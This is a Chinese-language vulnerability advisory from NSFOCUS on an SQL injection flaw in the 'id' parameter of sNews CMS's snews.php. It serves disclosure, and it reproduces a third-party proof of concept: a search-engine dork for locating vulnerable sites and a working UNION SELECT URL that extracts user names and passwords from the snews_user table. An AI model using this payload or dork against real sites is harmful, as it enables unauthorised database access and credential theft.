安全研究

安全漏洞
sNews CMS 'id' 参数SQL注入漏洞

发布日期:2013-01-15
更新日期:2013-01-21

受影响系统:
sNews CMS sNews CMS
描述:
BUGTRAQ  ID: 57422

sNews CMS是轻量级内容管理系统。

sNews CMS没有正确验证snews.php内的id参数值的合法性,在实现上存在SQL注入漏洞,可导致未授权数据库操作。

<*来源:onestree
  *>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

# Exploit Title : CMS snews SQL Injection Vulnerability
# Author        : By onestree
# Software Link : http://snewscms.com/
# tested        : ubuntu 12.10 / win 7
# Dork          : inurl:"tanyakan pada rumput yang bergoyang"


*************************************************************

SQL poc:

http://localhost/snews/snews.php?act=shownews&id=[SQL]

Example:

http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*


Thanks :

  Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell

          indonesiancoder - moeslimh4x0r - go-coder

spesial my hunny :*

建议:
厂商补丁:

sNews CMS
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://snewscms.com/

浏览次数:3999
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障